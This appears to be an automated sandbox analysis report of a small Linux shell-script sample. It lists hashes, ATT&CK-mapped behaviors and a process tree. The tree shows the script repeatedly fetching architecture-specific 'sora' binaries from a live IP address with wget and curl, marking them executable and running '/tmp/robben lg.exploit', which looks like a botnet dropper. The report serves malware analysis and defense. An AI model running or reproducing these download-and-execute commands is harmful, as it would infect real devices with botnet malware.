Analysis
-
max time kernel
14s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:26
Static task
static1
Behavioral task
behavioral1
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
-
Size
2KB
-
MD5
1d363d0224de71500a06aaf7e205d0bb
-
SHA1
13fe03fe502546c5b53e156db53090275844d2ba
-
SHA256
a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8
-
SHA512
6030ceebdd5f6f16cbf10c1f30dfaf057d7f533dd156dc03c28c93920350407f5b3aebc4e09f2a74fdf2f155c7027001aed4d892ce0f83fb8b54b87a5212ddde
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 703 chmod 780 chmod 817 chmod 829 chmod 750 chmod 690 chmod 716 chmod 757 chmod 799 chmod 835 chmod 674 chmod 811 chmod 823 chmod 805 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 675 robben /tmp/robben 691 robben /tmp/robben 705 robben /tmp/robben 717 robben /tmp/robben 751 robben /tmp/robben 758 robben /tmp/robben 782 robben /tmp/robben 800 robben /tmp/robben 806 robben /tmp/robben 812 robben /tmp/robben 818 robben /tmp/robben 824 robben /tmp/robben 830 robben /tmp/robben 836 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 677 wget 686 curl 688 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Processes
-
/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh1⤵
- Writes file to tmp directory
PID:649 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:652
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:661
-
-
/bin/catcat sora.x862⤵PID:671
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:675
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:677
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:686
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:688
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:691
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:693
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:697
-
-
/bin/catcat sora.x86_642⤵PID:701
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:705
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:707
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:710
-
-
/bin/catcat sora.i4682⤵PID:715
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:717
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:720
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:743
-
-
/bin/catcat sora.i6862⤵PID:748
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:753
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:755
-
-
/bin/catcat sora.mpsl2⤵PID:756
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:760
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:774
-
-
/bin/catcat sora.arm42⤵PID:778
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:784
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:797
-
-
/bin/catcat sora.arm52⤵PID:798
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:802
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:803
-
-
/bin/catcat sora.arm62⤵PID:804
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:806
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:808
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:809
-
-
/bin/catcat sora.arm72⤵PID:810
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:814
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:815
-
-
/bin/catcat sora.ppc2⤵PID:816
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:818
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:820
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:821
-
-
/bin/catcat sora.ppc440fp2⤵PID:822
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:826
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:827
-
-
/bin/catcat sora.m68k2⤵PID:828
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:832
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:833
-
-
/bin/catcat sora.sh42⤵PID:834
-
-
/bin/chmodchmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/robben./robben lg.exploit2⤵
- Executes dropped EXE
PID:836
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1